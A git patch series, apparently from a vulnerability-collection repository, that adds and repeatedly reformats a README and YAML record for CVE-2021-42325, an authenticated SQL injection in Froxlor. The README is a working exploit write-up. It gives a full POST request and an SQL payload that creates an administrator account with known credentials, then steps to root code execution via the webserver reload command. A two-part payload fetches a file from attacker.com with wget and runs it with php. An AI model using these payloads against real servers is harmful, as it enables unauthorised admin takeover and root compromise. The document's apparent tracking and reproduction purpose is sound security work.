From 54c29ee827c45b9a3da14c0548f1c279323e8ad6 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:33:44 +0000 Subject: [PATCH 01/31] add cve/Froxlor/2023. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/CVE-2021-42325 diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325 new file mode 100644 index 00000000..e69de29b -- Gitee From 18793a73c6c59b092594c5bbb05255403116fe41 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:34:49 +0000 Subject: [PATCH 02/31] rename cve/Froxlor/2023/CVE-2021-42325 to cve/Froxlor/2023/CVE-2021-42325/. Signed-off-by: wangyue --- cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} (100%) diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325/README.md similarity index 100% rename from cve/Froxlor/2023/CVE-2021-42325 rename to cve/Froxlor/2023/CVE-2021-42325/README.md -- Gitee From 3f170b508a53c7fba7af07ef0f29e0d8dd14e599 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:35:37 +0000 Subject: [PATCH 03/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 91 +++++++++++++++++++++++ 1 file changed, 91 insertions(+) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index e69de29b..4fd9416a 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md 
@@ -0,0 +1,91 @@ +# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +# Exploit Author: Martin Cernac +# Date: 2021-11-05 +# Vendor: Froxlor (https://froxlor.org/) +# Software Link: https://froxlor.org/download.php +# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +# Patched Version: 0.10.30 +# Category: Web Application +# Tested on: Ubuntu +# CVE: 2021-42325 + +# 1. Technical Description: +# +# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +# +# 1.1 Pre-requisites +# - Access to a customer account +# - Ability to specify database name when creating a database +# - Feature only availible from 0.10.28 onward and must be manually enabled + + +# 2. Proof Of Concept (PoC): +# +# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +# 2.1 Privilege Escalation +# +# - Sign into Froxlor as a customer +# - View your databases +# - Create a database +# - Put your payload into the "User/Database name" field (if enabled) +# - Application will error out however your SQL query will be executed +# +# The following is a POST request example of running the payload provided, resulting in an administrator account being created +--- +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 + 
+s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 +--- +# +# 2.2 Remote Code Execution +# +# To achieve RCE as root: +# +# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) +# - Go to System Settings +# - Go to Webserver settings +# - Adjust "Webserver reload command" field to a custom command +# - The command must not contain any of the following special characters: ;|&><`$~? +# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php +# - For example commands see Payloads 4.2 section +# - Trigger configuration file rebuild +# - Use menu item "Rebuild config files" +# - Await a root cron job to execute your command + + +# 3. Vulnerable resources and parameters +# /customer_mysql.php (POST field: custom_suffix) + + +# 4. Payloads +# +# 4.1 SQL Injection payload +# The following payload creates a new Froxlor admin with full access to all customers and the server configuration +# The credentials are: +# - username: x +# - password: a +# +# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- +# +# +# 4.2 Remote Code Execution payload +# Two part payload: +# - wget http://attacker.com/malicious.txt -O /runme.php +# - php /runme.php + + +# 5. 
Timeline +# 2021-10-11 Discovery +# 2021-10-11 Contact with developer +# 2021-10-11 Patch issued but no release rolled out +# 2021-10-12 Reserved CVE-2021-42325 +# 2021-11-05 Fix release rolled out +# 2021-11-07 Public disclosure + + +# 6. References: +# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 86bbafbf3917be0e73fe3b00d1c7a9a0cbe73958 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:38:34 +0000 Subject: [PATCH 04/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 25 +++++++++-------------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 4fd9416a..c9cd9d3f 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -9,17 +9,15 @@ # Tested on: Ubuntu # CVE: 2021-42325 -# 1. Technical Description: -# -# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. # # 1.1 Pre-requisites # - Access to a customer account # - Ability to specify database name when creating a database # - Feature only availible from 0.10.28 onward and must be manually enabled - - -# 2. Proof Of Concept (PoC): + +### 2. Proof Of Concept (PoC): # # The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # 
@@ -56,12 +54,11 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # - Use menu item "Rebuild config files" # - Await a root cron job to execute your command - -# 3. Vulnerable resources and parameters +### 3. Vulnerable resources and parameters # /customer_mysql.php (POST field: custom_suffix) -# 4. Payloads +### 4. Payloads # # 4.1 SQL Injection payload # The following payload creates a new Froxlor admin with full access to all customers and the server configuration @@ -76,16 +73,14 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # Two part payload: # - wget http://attacker.com/malicious.txt -O /runme.php # - php /runme.php - - -# 5. Timeline + +### 5. Timeline # 2021-10-11 Discovery # 2021-10-11 Contact with developer # 2021-10-11 Patch issued but no release rolled out # 2021-10-12 Reserved CVE-2021-42325 # 2021-11-05 Fix release rolled out # 2021-11-07 Public disclosure - - -# 6. References: + +### 6. References: # https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 2bcb9fd63017e32e2873c2c9c706aa355821b7cd Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:40:39 +0000 Subject: [PATCH 05/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 126 +++++++++++----------- 1 file changed, 63 insertions(+), 63 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index c9cd9d3f..1a371371 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md 
@@ -1,35 +1,35 @@ -# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -# Exploit Author: Martin Cernac -# Date: 2021-11-05 -# Vendor: Froxlor (https://froxlor.org/) -# Software Link: https://froxlor.org/download.php -# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -# Patched Version: 0.10.30 -# Category: Web Application -# Tested on: Ubuntu -# CVE: 2021-42325 + Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) + Exploit Author: Martin Cernac + Date: 2021-11-05 + Vendor: Froxlor (https://froxlor.org/) + Software Link: https://froxlor.org/download.php + Affected Version: 0.10.28, 0.10.29, 0.10.29.1 + Patched Version: 0.10.30 + Category: Web Application + Tested on: Ubuntu + CVE: 2021-42325 ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. -# -# 1.1 Pre-requisites -# - Access to a customer account -# - Ability to specify database name when creating a database -# - Feature only availible from 0.10.28 onward and must be manually enabled + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled ### 2. 
Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # -# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -# 2.1 Privilege Escalation -# -# - Sign into Froxlor as a customer -# - View your databases -# - Create a database -# - Put your payload into the "User/Database name" field (if enabled) -# - Application will error out however your SQL query will be executed -# -# The following is a POST request example of running the payload provided, resulting in an administrator account being created +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + + The following is a POST request example of running the payload provided, resulting in an administrator account being created --- POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost 
@@ -38,49 +38,49 @@ Content-Length: 448 s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 --- -# -# 2.2 Remote Code Execution -# -# To achieve RCE as root: -# -# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) -# - Go to System Settings -# - Go to Webserver settings -# - Adjust "Webserver reload command" field to a custom command -# - The command must not contain any of the following special characters: ;|&><`$~? -# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php -# - For example commands see Payloads 4.2 section -# - Trigger configuration file rebuild -# - Use menu item "Rebuild config files" -# - Await a root cron job to execute your command + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command ### 3. Vulnerable resources and parameters -# /customer_mysql.php (POST field: custom_suffix) + /customer_mysql.php (POST field: custom_suffix) ### 4. 
Payloads -# -# 4.1 SQL Injection payload -# The following payload creates a new Froxlor admin with full access to all customers and the server configuration -# The credentials are: -# - username: x -# - password: a -# -# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- -# -# -# 4.2 Remote Code Execution payload -# Two part payload: -# - wget http://attacker.com/malicious.txt -O /runme.php -# - php /runme.php + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php ### 5. Timeline -# 2021-10-11 Discovery -# 2021-10-11 Contact with developer -# 2021-10-11 Patch issued but no release rolled out -# 2021-10-12 Reserved CVE-2021-42325 -# 2021-11-05 Fix release rolled out -# 2021-11-07 Public disclosure + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure ### 6. References: -# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 2000c8ddd372bc0a1dcce68251fb134edbc35fc9 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:42:39 +0000 Subject: [PATCH 06/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. 
Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 31 +++++++++++++---------- 1 file changed, 17 insertions(+), 14 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 1a371371..c1b38e2e 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -1,13 +1,14 @@ - Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) - Exploit Author: Martin Cernac - Date: 2021-11-05 - Vendor: Froxlor (https://froxlor.org/) - Software Link: https://froxlor.org/download.php - Affected Version: 0.10.28, 0.10.29, 0.10.29.1 - Patched Version: 0.10.30 - Category: Web Application - Tested on: Ubuntu - CVE: 2021-42325 +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. 
@@ -28,16 +29,18 @@ The following is a walkthrough of privilege escalation from a mere customer to a - Create a database - Put your payload into the "User/Database name" field (if enabled) - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created ---- + + +``` POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 448 - s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 ---- + +``` + #### 2.2 Remote Code Execution -- Gitee From 0f51ff6db44f49eb32eb27b399028cc06c6f76fa Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:44:07 +0000 Subject: [PATCH 07/31] add cve/Froxlor/2023/yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From 0a8d8b813f3b21cc5a3654f722eed7b18d72af8b Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:50:02 +0000 Subject: [PATCH 08/31] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) 
diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index e69de29b..85ee9e0e 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-42325 +source: + https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: | + Froxlor是Froxlor团队的一套轻量级服务器管理软件。 + Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 + scope-of-influence: + Froxlor 0.10.2l9.1 + reference: + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - https://www.exploit-db.com/exploits/50502 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-42325 + edb-id: 50502 + cwe-id: None + cnvd-id: None + kve-id: None + tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From a97ae870fc7a447755af4468e4c685b5d3860d84 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:59:49 +0000 Subject: [PATCH 09/31] update openkylin_list.yaml. Signed-off-by: wangyue --- openkylin_list.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index a9f9109b..b3c155b5 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -41,6 +41,9 @@ cve: - CVE-2019-0230 Influx-DB: - CVE-2019-20933 + Froxlor: + - CVE-2023-0315 + - CVE-2021-42325 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 -- Gitee From 078f121583b948bd6307c3e2d26f48913b4c481a Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 03:47:33 +0000 Subject: [PATCH 10/31] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) 
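Review bot: The `name:` field in the new CVE-2021-42325.yaml holds a product blurb ("Froxlor是一款易于使用且功能强大的服务器管理面板…") rather than a name for the vulnerability, while `description:` already carries the product sentence again; the two fields read as duplicates. If `name` is meant to be the issue title, as the sibling `cve-id`/`cwe-id` fields suggest, something like `name: Froxlor 自定义数据库名称 SQL 注入 (DbManagerMySQL.php)` would let the entry be found by what it describes. The file also ends without a trailing newline (`\ No newline at end of file`), which some YAML tooling and diff viewers flag.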
diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index 85ee9e0e..c266bcd9 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -3,22 +3,24 @@ source: https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: high + severity: 高危 description: | Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: Froxlor 0.10.2l9.1 reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 + - https://avd.aliyun.com/detail?id=AVD-2021-42325 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - https://www.exploit-db.com/exploits/50502 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-42325 edb-id: 50502 - cwe-id: None + cwe-id: CWE-89 cnvd-id: None kve-id: None tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From 896c6642c1a79047ca163bfca1085897915bfd33 Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 03:54:41 +0000 Subject: [PATCH 11/31] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index c266bcd9..f7274053 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml 
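Review bot: The new `cvss-metrics` line switches the vector from `PR:L` to `PR:N` (and the score from 8.8 to 9.8), but every other artefact in this series says the injection is authenticated: the README in PATCH 03 is titled "SQL Injection (Authenticated)" and lists "Access to a customer account" as a pre-requisite, and `PR:L` is the vector component that expresses exactly that. If the new value is copied from the NVD record now listed under `reference:`, a short comment such as `# vector/score as published by NVD; the PoC itself requires a customer login` would stop the next reader from treating it as a typo; otherwise `PR:L` / 8.8 is the vector the page's own evidence supports. In the same hunk `severity: 高危` (High) no longer matches `cvss-score: 9.8`, which falls in the CVSS v3.1 Critical band (9.0–10.0); whichever score is kept, the label should follow it.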
@@ -8,7 +8,7 @@ info: Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: - Froxlor 0.10.2l9.1 + Froxlor 0.9~0.10.30 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 @@ -19,7 +19,6 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42325 - edb-id: 50502 cwe-id: CWE-89 cnvd-id: None kve-id: None -- Gitee From e15f4227dde3d34ecb47ca67c56313b81926d9d7 Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 04:00:43 +0000 Subject: [PATCH 12/31] =?UTF-8?q?update=20openkylin=5Flist.yaml.=20=20Frox?= =?UTF-8?q?lor=E5=B7=B2=E5=90=88=E5=B9=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: wangyue --- openkylin_list.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index b3c155b5..9666a486 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -41,9 +41,6 @@ cve: - CVE-2019-0230 Influx-DB: - CVE-2019-20933 - Froxlor: - - CVE-2023-0315 - - CVE-2021-42325 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -163,6 +160,7 @@ cve: Grafana: - CVE-2021-43798 Froxlor: + - CVE-2021-42325 - CVE-2023-0315 cnvd: apache-tomcat: -- Gitee From bd1c0be634868d709ef9a53bd5665cd31a510dfb Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:48:19 +0000 Subject: [PATCH 13/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/2023/.keep diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ef137df4ee5ac0ee0198a4997a69c23a04ac9c8d Mon Sep 17 00:00:00 2001 
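Review bot: The new `scope-of-influence` value `Froxlor 0.9~0.10.30` includes 0.10.30, which the README in this same series records as the patched version ("Patched Version: 0.10.30") and which the reference list points to as the fix release tag; an inclusive upper bound on the fixed version will misclassify patched installs. The README's "Affected Version" line and its note that the custom database-name feature only exists from 0.10.28 onward suggest `Froxlor 0.10.28 ~ 0.10.29.1`, or at minimum `Froxlor < 0.10.30`, unless the wider 0.9 lower bound comes from a source not cited here. The second hunk drops `edb-id: 50502` while the exploit-db URL stays under `reference:`, so nothing is lost, but the reason for removing the structured field would be worth a word in the commit message.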
From: wangyue Date: Mon, 10 Apr 2023 01:48:27 +0000 Subject: [PATCH 14/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2023/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2023/2023/.keep diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 5af792b5c1c8d1eeafdeb5c402a80d2fd7ef7319 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:49:11 +0000 Subject: [PATCH 15/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 7793c8130e96ad0fe383ec0d0f8092eed6900dd9 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:50:27 +0000 Subject: [PATCH 16/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 77ea81cb0c72833ce0bc1507f407a7dd67adcf59 Mon Sep 17 00:00:00 2001 
From: wangyue Date: Mon, 10 Apr 2023 01:50:34 +0000 Subject: [PATCH 17/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From aa46c27f5c2ce3ac5ae6b1dd1f2bbf7e8df37428 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:28 +0000 Subject: [PATCH 18/31] add cve/Froxlor/2021/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/README.md | 89 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/README.md 
